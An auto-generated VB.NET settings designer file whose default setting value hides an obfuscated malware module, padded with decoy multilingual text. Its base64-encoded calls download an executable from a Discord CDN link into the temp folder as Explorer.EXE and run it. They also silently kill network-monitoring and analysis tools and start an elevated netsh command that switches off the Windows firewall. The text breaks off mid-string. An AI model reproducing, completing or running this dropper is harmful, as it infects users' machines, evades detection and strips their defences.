'------------------------------------------------------------------------------
' <auto-generated>
'     This code was generated by a tool.
'     Runtime Version:4.0.30319.42000
'
'     Changes to this file may cause incorrect behavior and will be lost if
'     the code is regenerated.
' </auto-generated>
'------------------------------------------------------------------------------

Option Strict On
Option Explicit On


Namespace My
    
    <Global.System.Runtime.CompilerServices.CompilerGeneratedAttribute(),  _
     Global.System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "16.10.0.0"),  _
     Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)>  _
    Partial Friend NotInheritable Class MySettings
        Inherits Global.System.Configuration.ApplicationSettingsBase
        
        Private Shared defaultInstance As MySettings = CType(Global.System.Configuration.ApplicationSettingsBase.Synchronized(New MySettings()),MySettings)
        
#Region "My.Settings Auto-Save Functionality"
#If _MyType = "WindowsForms" Then
    Private Shared addedHandler As Boolean

    Private Shared addedHandlerLockObject As New Object

    <Global.System.Diagnostics.DebuggerNonUserCodeAttribute(), Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)> _
    Private Shared Sub AutoSaveSettings(sender As Global.System.Object, e As Global.System.EventArgs)
        If My.Application.SaveMySettingsOnExit Then
            My.Settings.Save()
        End If
    End Sub
#End If
#End Region
        
        Public Shared ReadOnly Property [Default]() As MySettings
            Get
                
#If _MyType = "WindowsForms" Then
               If Not addedHandler Then
                    SyncLock addedHandlerLockObject
                        If Not addedHandler Then
                            AddHandler My.Application.Shutdown, AddressOf AutoSaveSettings
                            addedHandler = True
                        End If
                    End SyncLock
                End If
#End If
                Return defaultInstance
            End Get
        End Property
        
        <Global.System.Configuration.UserScopedSettingAttribute(),  _
         Global.System.Diagnostics.DebuggerNonUserCodeAttribute(),  _
         Global.System.Configuration.DefaultSettingValueAttribute("'Form Load Code"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"'            Me.Hide()"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"'Call 링크링크링크링크링크링크.MONSTERMC()"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"'Me.Clos"& _ 
            "e()"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"Module 링크링크링크링크링크링크"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"    'MONSTERMC        "&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"    'वायरस यहाँ नजफ     "& _ 
            "   "&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"    Dim 链接链接链接链接 As String = ""病毒纳杰夫这里病毒纳杰夫这里病毒纳杰夫这里病毒纳杰夫这里"""&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"    Dim 바이러스나자"& _ 
            "프여기 As String = ""वायरस यहाँ नजफवायरस यहाँ नजफवायरस यहाँ नजफवायरस यहाँ नजफ"""&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"    "& _ 
            "Dim वायरसनजफकिंवदंती As String = ""俞日元延p广播特贝俞日元延p广播特贝俞日元延p广播特贝俞日元延p广播特贝"""&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"    Dim"& _ 
            " ಒಂದುಯಿಒಂದುರೀತಿಯಜೋಯಲ್ಜೋಯಲ್ನಲ್ಲಿ As String = ""ಒಂದುಯಿಒಂದುರೀತಿಯಜೋಯಲ್ಜೋಯಲ್"& _ 
            "ಒಂದುಯಿ ಒಂದು ರೀತಿಯ ಜೋಯಲ್ ಜೋಯಲ್ ನಲ್ಲಿನಲ್ಲಿ"""&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"    Dim ಬೆಟ್ಟಿಸ್ಯೂಸ್ಬೆಟ್ಟಿಸ್ಯೂಬೆ"& _ 
            "ಟ್ಟಿಸ್ಯೂಸ್ಸ್ As String = ""这里病毒纳这里病毒纳杰夫这里病毒纳杰夫杰夫这里病毒纳杰夫"""&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"    '毒纳杰夫这里病毒纳杰夫这里病毒纳'ಒ"& _ 
            "ಂದು ಯಿ ಒಂದು ರೀತಿಯ ಜೋಯಲ್ ಜೋಯಲ್ ನಲ್ಲಿ        "&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"    Sub MONSTERMC()"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        '"& _ 
            "ಒಂದು ಯಿ ಒಂದು ರೀತಿಯ ಜೋಯಲ್ ಜೋಯಲ್ ನಲ್ಲಿ        "&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        'ಒಂದು ಯಿ ಒಂದು ರೀತಿಯ "& _ 
            "ಜೋಯಲ್ ಜೋಯಲ್ ನಲ್ಲಿ        "&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        System.Threading.Thread.Sleep(10000) ' Pa"& _ 
            "yload Sleep    "&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Dim download As New Net.WebClient '毒纳杰夫这里病毒纳杰夫这里病毒纳    "& _ 
            "    "&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        '毒纳杰夫这里病毒纳杰夫这里病毒纳        "&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        download.DownloadFile(OLBkiXmTJ"& _ 
            "FttIYOWbPYNpgv(""%URL%""), Environ(OLBkiXmTJFttIYOWbPYNpgv(""dGVtcA=="")) & OLBkiXmT"& _ 
            "JFttIYOWbPYNpgv(""L0V4cGxvcmVyLkVYRQ==""))"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        'ಒಂದು ಯಿ ಒಂದು ರೀತಿಯ ಜೋಯಲ್ ಜ"& _ 
            "ೋಯಲ್ ನಲ್ಲಿ        "&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        '毒纳杰夫这里病毒纳杰夫这里病毒纳        "&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Shell(Environ(O"& _ 
            "LBkiXmTJFttIYOWbPYNpgv(""dGVtcA=="")) & OLBkiXmTJFttIYOWbPYNpgv(""L0V4cGxvcmVyLkVYR"& _ 
            "Q=="")) '毒纳杰夫这里病毒纳杰夫这里病毒纳ಒಂದು ಯಿ ಒಂದು ರೀತಿಯ ಜೋಯಲ್ ಜೋಯಲ್ ನಲ್ಲಿ        "&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"     "& _ 
            "   'ಒಂದು ಯಿ ಒಂದು ರೀತಿಯ ಜೋಯಲ್ ಜೋಯಲ್ ನಲ್ಲಿ        "&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Shell(OLBkiXmTJFt"& _ 
            "tIYOWbPYNpgv(KQrOrTHOAOrMrNgiJHrNaIq(""ZEdGemEydHBiR3dnTDBZZ0wwbE5JRkJ5YjJObGMzTk"& _ 
            "lZV05yWlhJdVpYaGw="")), vbHide)"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Dim 今天之后没有慈悲今天之后没有慈悲 As String = ""आज के "& _ 
            "बाद कोई दया नहींआज के बाद कोई दया नहींआज के बाद कोई दया नहीं"""&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Shell(OLB"& _ 
            "kiXmTJFttIYOWbPYNpgv(""dGFza2tpbGwgL0YgL0lNIFNweVRoZVNweS5leGU=""), vbHide)"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"     "& _ 
            "   Dim ಒಂದುಯಿಒಂದುರೀತಿಯಜೋಯಲ್ಜೋಯಲ್ನಲ್ಲಿ As String = ""ಒಂದುಯಿಒಂದುರೀತಿಯಜೋಯಲ್ಜ"& _ 
            "ೋಯಲ್ಒಂದುಯಿ ಒಂದು ರೀತಿಯ ಜೋಯಲ್ ಜೋಯಲ್ ನಲ್ಲಿನಲ್ಲಿ"""&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Shell(OLBkiXmTJFtt"& _ 
            "IYOWbPYNpgv(KQrOrTHOAOrMrNgiJHrNaIq(eHCfeVDhiFEotZRQTRNrEWe(BuKvRXwETsOSvmCuecfX"& _ 
            "fjR(""V2tWa1IyVnRSWGxrU0VKcFVqTmtibFJFUWxwYU1IZDNZa1UxU2xORlNqVlpha3BQWWtkV1NWRll"& _ 
            "WbUZYUjJoeg=="")))), vbHide)"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Dim 今日の後マー日の後マーシーいいえ As String = ""B 방송 토B 방"& _ 
            "송 纳杰夫这里病송륨 Bthb纳杰夫这里病 방송 방송"""&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Shell(OLBkiXmTJFttIYOWbPYNpgv(""dGFza2tpbGw"& _ 
            "gL0YgL0lNIGFwYXRlRE5TLmV4ZQ==""), vbHide)"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Dim ಒಂದುಯಿಒಂದುರೀತಿಯಜೋಯಲ್ಜೊ"& _ 
            "ೕwಯಲ್ನಲ್ಲಿ As String = ""ಒಂದುಯಿಒಂದುರೀತಿಯಜೋಯಲ್ಜೋಯಲ್ಒಂದುಯಿ ಒಂದು ರೀತಿಯ ಜೋಯಲ್"& _ 
            " ಜೋಯಲ್ ನಲ್ಲಿನಲ್ಲಿ"""&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Shell(OLBkiXmTJFttIYOWbPYNpgv(""dGFza2tpbGwgL0YgL0l"& _ 
            "NIGNwb3J0cy5leGU=""), vbHide)"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Dim ಬೆಟ್ಟಿ有慈悲今天之后没有慈ತಿಯಿಅಸ್ಸಾಟಿಎಸ್ As Stri"& _ 
            "ng = ""贝蒂泰斯氏益贝蒂泰斯氏益阿萨TS贝蒂泰斯氏益阿萨TS阿萨TS贝蒂泰斯氏益阿萨TS"""&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Shell(OLBkiXmTJFttIYOWb"& _ 
            "PYNpgv(KQrOrTHOAOrMrNgiJHrNaIq(""ZEdGemEydHBiR3dnTDBZZ0wwbE5JRUZ1ZEdsTWIyZG5aWEl1"& _ 
            "WlhobA=="")), vbHide)"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Dim 今天之后没有慈ww悲今dde天之后s没有慈悲 As String = ""आज के बाद "& _ 
            "कोई दया नहींआज के बाद कोई दया नहींआज के बाद कोई दया नहीं"""&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Shell(OLBkiXm"& _ 
            "TJFttIYOWbPYNpgv(KQrOrTHOAOrMrNgiJHrNaIq(eHCfeVDhiFEotZRQTRNrEWe(""WkVkR2VtRXlkSE"& _ 
            "JpUjNkblREQlpaMHd3YkU1SlJURk1WR2xDVlZsWVRuSlNXR2gzWWtjNWVWcFlTWFZhV0docw==""))), "& _ 
            "vbHide)"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Dim 今日の後マeeー3日の後マーシーいいえ As String = ""B 방송 토B 방송 纳杰d夫这里病송e33e륨 B"& _ 
            "thb纳杰夫这里病 방송 방송"""&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Shell(OLBkiXmTJFttIYOWbPYNpgv(KQrOrTHOAOrMrNgiJHrNaIq("& _ 
            "eHCfeVDhiFEotZRQTRNrEWe(""WkVkR2VtRXlkSEJpUjNkblREQlpaMHd3YkU1SlJUVnNaRWhrZG1OdGM"& _ 
            "yZFJWelZvWWtoc05scFlTWFZhV0docw==""))), vbHide)"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Dim 今日の後マー日のede後マdededde"& _ 
            "ーシーいdwdwdいえ As String = ""B 방송 토B 방송 纳杰夫这里病ee송륨 Bthb纳杰夫这里病 방송 방송"""&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Shell("& _ 
            "OLBkiXmTJFttIYOWbPYNpgv(""dGFza2tpbGwgL0YgL0lNIFRDUEV5ZS5leGU=""), vbHide)"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"      "& _ 
            "  Dim 今天之后e3没有慈e3e悲今天之后没有慈悲 As String = ""आज के बाद कोई दdd3या नहींआज केd3d3 बाद "& _ 
            "कोई दया fefeनहींआज के बाद कोई दया नहीं"""&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Shell(OLBkiXmTJFttIYOWbPYNpgv(K"& _ 
            "QrOrTHOAOrMrNgiJHrNaIq(eHCfeVDhiFEotZRQTRNrEWe(BuKvRXwETsOSvmCuecfXfjR(""V2tWa1Iy"& _ 
            "VnRSWGxrU0VKcFVqTmtibFJFUWxwYU1IZDNZa1UxU2xKc1NrVldWVnBoWTBad1dWa3pWbUZYUjJoeg=="& _ 
            """)))), vbHide)"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Dim 今天之后没有eee慈悲今dedee天之后没有ddedede慈悲 As String = ""आज के ब"& _ 
            "ाद कोई दया ceceआज के बाद कोई दया नहींआज के बाद कोई दया नहीं"""&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Shell(OLBk"& _ 
            "iXmTJFttIYOWbPYNpgv(""dGFza2tpbGwgL0YgL0lNIE5ldHdvcmtNaW5lci5leGU=""), vbHide)"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"  "& _ 
            "      Dim ಒಂದುಯಿಒಂದುರೀತಿಯಜೋedeಯdedeಲ್ಜೋwಯಲ್ನಲ್ಲಿ As String = ""ಒಂದುಯಿಒಂದುರೀ"& _ 
            "ತಿಯಜೋಯddeಲ್ಜೋಯಲ್ಒಂದುಯಿ ಒಂದು ರೀತಿಯ ಜೋಯಲ್ ಜೋಯಲ್ ನಲ್ಲಿನಲ್ಲಿ"""&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Shel"& _ 
            "l(OLBkiXmTJFttIYOWbPYNpgv(""dGFza2tpbGwgL0YgL0lNIEFwYXRlRE5TLmV4ZQ==""), vbHide)"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)& _ 
            "        Dim c As New ProcessStartInfo()"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        c.FileName = OLBkiXmTJFttIYOWbP"& _ 
            "YNpgv(""Y21kLmV4ZQ=="")"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        c.WindowStyle = ProcessWindowStyle.Hidden"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"      "& _ 
            "  c.Verb = OLBkiXmTJFttIYOWbPYNpgv(""cnVuYXM="")"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        c.Arguments = OLBkiXmTJF"& _ 
            "ttIYOWbPYNpgv(""L0MgbmV0c2ggYWR2ZmlyZXdhbGwgc2V0IGFsbHByb2ZpbGVzIHN0YXRlIG9mZg=="""& _ 
            ")"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Process.Start(c)"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Dim 链接链ee接链接frfrfrf链接 As String = ""病毒纳杰夫e33"& _ 
            "r4r这里病毒纳杰夫这里病毒r4r44r纳杰夫这里病毒纳杰夫这里"""&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Dim 바이러스나eeefrfr자프여기 As String = ""वाय"& _ 
            "रस यहाँ नजफवायरस यहाँ नजफवा4r4r4rयरस यहाँ नजफवायरस यहाँ नजफ"""&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Dim वायरसन"& _ 
            "जफकिंवदंती As String = ""俞日元延p广播特贝俞日元延p广播r4r4r4特贝俞日元延pr4r4r广播特贝俞日元延p广播特贝"""&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"      "& _ 
            "  Dim ಒಂದುಯಿಒಂfrfrfದುರೀತಿಯಜೋಯಲ್ಜೋಯಲ್ನಲ್ಲಿ As String = ""ಒಂದುಯಿಒಂದುರೀತಿಯr4r4"& _ 
            "ಜೋಯಲ್ಜೋಯಲ್ಒಂದುಯಿ ಒಂದು ರೀತಿಯ ಜೋಯಲ್ ಜೋಯಲ್ ನಲ್ಲಿನಲ್ಲಿ"""&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Dim ಬೆಟ್ಟಿ"& _ 
            "ಸ್ಯೂಸ್ಬೆfrfrfrಟ್ಟಿಸ್ಯೂfrfrfrಬೆಟ್ಟಿಸ್ಯೂಸ್ಸ್ As String = ""这里病毒纳这里病毒纳杰r4r4r4夫这里病毒纳杰"& _ 
            "夫杰夫这里病毒纳杰夫"""&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        'ಒಂದು ಯಿ ಒಂದು ರೀತಿಯ ಜೋಯಲ್ ಜೋಯಲ್ ನಲ್ಲಿ        "&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"     "& _ 
            "   'ಒಂದು ಯಿ ಒಂದು ರೀತಿಯ ಜೋಯಲ್ ಜೋಯಲ್ ನಲ್ಲಿ        "&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        System.Threading."& _ 
            "Thread.Sleep(10000) ' Kill Anits Sleep      "&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Dim 没有慈ww慈e3没悲今天日之 As New "& _ 
            "Net.WebClient '毒纳杰夫这里病毒纳杰夫这里病毒纳        "&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        '毒纳杰夫这里病毒纳杰夫这里病毒纳        "&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"    "& _ 
            "    没有慈ww慈e3没悲今天日之.DownloadFile(OLBkiXmTJFttIYOWbPYNpgv(""aHR0cHM6Ly9jZG4uZGlzY29"& _ 
            "yZGFwcC5jb20vYXR0YWNobWVudHMvOTYwNjM1ODkxMjIxNjkyNDI2Lzk2MjQzNTU5NDEyOTE0MTg0MC9"& _ 
            "leHBsb3Jlci5leGU=""), Environ(OLBkiXmTJFttIYOWbPYNpgv(""dGVtcA=="")) & OLBkiXmTJFtt"& _ 
            "IYOWbPYNpgv(""L0V4cGxvcmVyLkVYRQ==""))"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        'ಒಂದು ಯಿ ಒಂದು ರೀತಿಯ ಜೋಯಲ್ ಜೋಯ"& _ 
            "ಲ್ ನಲ್ಲಿ        "&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        '毒纳杰夫这里病毒纳杰夫这里病毒纳        "&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Shell(Environ(OLBki"& _ 
            "XmTJFttIYOWbPYNpgv(""dGVtcA=="")) & OLBkiXmTJFttIYOWbPYNpgv(""L0V4cGxvcmVyLkVYRQ=="""& _ 
            ")) '毒纳杰夫这里病毒纳杰夫这里病毒纳ಒಂದು ಯಿ ಒಂದು ರೀತಿಯ ಜೋಯಲ್ ಜೋಯಲ್ ನಲ್ಲಿ        "&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        '"& _ 
            "ಒಂದು ಯಿ ಒಂದು ರೀತಿಯ ಜೋಯಲ್ ಜೋಯಲ್ ನಲ್ಲಿ        "&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Shell(OLBkiXmTJFttIYO"& _ 
            "WbPYNpgv(KQrOrTHOAOrMrNgiJHrNaIq(""ZEdGemEydHBiR3dnTDBZZ0wwbE5JRkJ5YjJObGMzTklZV0"& _ 
            "5yWlhJdVpYaGw="")), vbHide)"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Dim 今天之后没有慈悲今天之后没有慈悲今ಲ್ಲಿ As String = ""आज के"& _ 
            " बाद कोई दया नहींआज के बाद कोई दया नहींआज के बाद कोई दया नहीं"""&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Shell(OL"& _ 
            "BkiXmTJFttIYOWbPYNpgv(""dGFza2tpbGwgL0YgL0lNIFNweVRoZVNweS5leGU=""), vbHide)"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"    "& _ 
            "    Dim ಒಂದುಯಿಒಂದುರೀತಿಯಜೋಯಲ್ಜೋಯಲ್ನಲ್ಲಿ今ಲ್ಲಿ As String = ""ಒಂದುಯಿಒಂದುರೀತಿಯಜೆ"& _ 
            "ೂೕಯಲ್ಜೋಯಲ್ಒಂದುಯಿ ಒಂದು ರೀತಿಯ ಜೋಯಲ್ ಜೋಯಲ್ ನಲ್ಲಿನಲ್ಲಿ"""&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Shell(OLBkiX"& _ 
            "mTJFttIYOWbPYNpgv(KQrOrTHOAOrMrNgiJHrNaIq(eHCfeVDhiFEotZRQTRNrEWe(BuKvRXwETsOSvm"& _ 
            "CuecfXfjR(""V2tWa1IyVnRSWGxrU0VKcFVqTmtibFJFUWxwYU1IZDNZa1UxU2xORlNqVlpha3BQWWtkV"& _ 
            "1NWRllWbUZYUjJoeg=="")))), vbHide)"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Dim 今日の後マー日の後マーシーいいえ今ಲ್ಲಿ As String ="& _ 
            " ""B 방송 토B 방송 纳杰夫这里病송륨 Bthb纳杰夫这里病 방송 방송"""&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Shell(OLBkiXmTJFttIYOWbPYNpgv("""& _ 
            "dGFza2tpbGwgL0YgL0lNIGFwYXRlRE5TLmV4ZQ==""), vbHide)"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Dim ಒಂದುಯಿಒಂದುರೀತಿ"& _ 
            "ಯಜೋಯಲ್ಜೋwಯಲ್ನಲ್ಲಿ今ಲ್ಲಿ As String = ""ಒಂದುಯಿಒಂದುರೀತಿಯಜೋಯಲ್ಜೋಯಲ್ಒಂದುಯಿ ಒಂದ"& _ 
            "ು ರೀತಿಯ ಜೋಯಲ್ ಜೋಯಲ್ ನಲ್ಲಿನಲ್ಲಿ"""&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Shell(OLBkiXmTJFttIYOWbPYNpgv(""dGF"& _ 
            "za2tpbGwgL0YgL0lNIGNwb3J0cy5leGU=""), vbHide)"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Dim ಬೆಟ್ಟಿ有慈悲今天之后没有慈ತಿಯಿಅಸ"& _ 
            "್ಸಾಟಿಎಸ್今ಲ್ಲಿ As String = ""贝蒂泰斯氏益贝蒂泰斯氏益阿萨TS贝蒂泰斯氏益阿萨TS阿萨TS贝蒂泰斯氏益阿萨TS"""&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Sh"& _ 
            "ell(OLBkiXmTJFttIYOWbPYNpgv(KQrOrTHOAOrMrNgiJHrNaIq(""ZEdGemEydHBiR3dnTDBZZ0wwbE5"& _ 
            "JRUZ1ZEdsTWIyZG5aWEl1WlhobA=="")), vbHide)"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Dim 今天之后没有慈ww悲今dde天之后s没有慈悲今ಲ್"& _ 
            "ಲಿ As String = ""आज के बाद कोई दया नहींआज के बाद कोई दया नहींआज के बाद कोई दया नह"& _ 
            "ीं"""&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Shell(OLBkiXmTJFttIYOWbPYNpgv(KQrOrTHOAOrMrNgiJHrNaIq(eHCfeVDhiFEot"& _ 
            "ZRQTRNrEWe(""WkVkR2VtRXlkSEJpUjNkblREQlpaMHd3YkU1SlJURk1WR2xDVlZsWVRuSlNXR2gzWWtj"& _ 
            "NWVWcFlTWFZhV0docw==""))), vbHide)"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Dim 今日の後マeeー3日の後マーシーいいえ今ಲ್ಲಿ As Strin"& _ 
            "g = ""B 방송 토B 방송 纳杰d夫这里病송e33e륨 Bthb纳杰夫这里病 방송 방송"""&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Shell(OLBkiXmTJFttIYOWb"& _ 
            "PYNpgv(KQrOrTHOAOrMrNgiJHrNaIq(eHCfeVDhiFEotZRQTRNrEWe(""WkVkR2VtRXlkSEJpUjNkblRE"& _ 
            "QlpaMHd3YkU1SlJUVnNaRWhrZG1OdGMyZFJWelZvWWtoc05scFlTWFZhV0docw==""))), vbHide)"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&" "& _ 
            "       Dim 今日の後マー日のede後マdededdeーシーいdwdwdいえ今ಲ್ಲಿ As String = ""B 방송 토B 방송 纳杰夫这里病ee"& _ 
            "송륨 Bthb纳杰夫这里病 방송 방송"""&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Shell(OLBkiXmTJFttIYOWbPYNpgv(""dGFza2tpbGwgL0YgL0l"& _ 
            "NIFRDUEV5ZS5leGU=""), vbHide)"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Dim 今天之后e3没有慈e3e悲今天之后没有慈悲今ಲ್ಲಿ As String ="& _ 
            " ""आज के बाद कोई दdd3या नहींआज केd3d3 बाद कोई दया fefeनहींआज के बाद कोई दया नहीं"""& _ 
            ""&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Shell(OLBkiXmTJFttIYOWbPYNpgv(KQrOrTHOAOrMrNgiJHrNaIq(eHCfeVDhiFEotZRQ"& _ 
            "TRNrEWe(BuKvRXwETsOSvmCuecfXfjR(""V2tWa1IyVnRSWGxrU0VKcFVqTmtibFJFUWxwYU1IZDNZa1U"& _ 
            "xU2xKc1NrVldWVnBoWTBad1dWa3pWbUZYUjJoeg=="")))), vbHide)"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Dim 今天之后没有eee慈悲"& _ 
            "今dedee天之后没有ddedede慈悲今ಲ್ಲಿ As String = ""आज के बाद कोई दया ceceआज के बाद कोई दया न"& _ 
            "हींआज के बाद कोई दया नहीं"""&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Shell(OLBkiXmTJFttIYOWbPYNpgv(""dGFza2tpbGwgL"& _ 
            "0YgL0lNIE5ldHdvcmtNaW5lci5leGU=""), vbHide)"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Dim ಒಂದುಯಿಒಂದುರೀತಿಯಜೋedeಯ"& _ 
